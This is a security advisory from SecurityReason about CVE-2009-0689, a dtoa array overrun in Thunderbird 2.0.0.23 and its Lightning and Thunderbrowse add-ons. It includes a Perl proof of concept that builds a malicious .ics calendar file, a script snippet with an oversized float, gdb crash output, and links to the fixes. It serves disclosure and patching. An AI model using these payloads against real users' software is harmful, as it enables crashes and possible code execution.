[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Thunderbird 2.0.0.23
Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/78
--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it?s easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.
--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for
thunderbird.
Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
(PoC for Lightning )
-----------------------
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3
my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T020000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T030000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".
"DTEND;TZID=Europe/Prague:20100111T120000\n".
"END:VEVENT\n".
"END:VCALENDAR\n";
open(myfile,'>>test.ics');
print myfile $header.$s.$expl.$footer;
-----------------------
(PoC for Thunderbrowse )
-----------------------
<script>
var a=0.<?php echo str_repeat("1",333333); ?>;
</script>
-----------------------
When we use Thunderbrowse to see this site, Thunderbird will crash with:
Program terminated with signal 11, Segmentation fault.
#0 0xbb15d1e7 in ?? ()
eax 0x0 0
ecx 0xa 10
edx 0x0 0
ebx 0xbb16eb38 -1156125896
esp 0xbfbfce58 0xbfbfce58
ebp 0xbfbfce74 0xbfbfce74
esi 0xb 11
edi 0xb768e700 -1217861888
eip 0xbb15d1e7 0xbb15d1e7
eflags 0x282 [ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0xab 171
gs 0xb3 179
(gdb) x/x ($eip)
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb: Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700: 0x1c71c71c
now esi=0xb and edi=0x1c71c71c
(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420
0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a
0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d
0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44
0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9
0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49
0xb7697848: 0xd75822f6 0x83ebbe5a
--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
This list is not yet closed.
--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
--- 6. Greets ---
Infospec p_e_a pi3
--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg
http://securityreason.com/
http://securityreason.pl/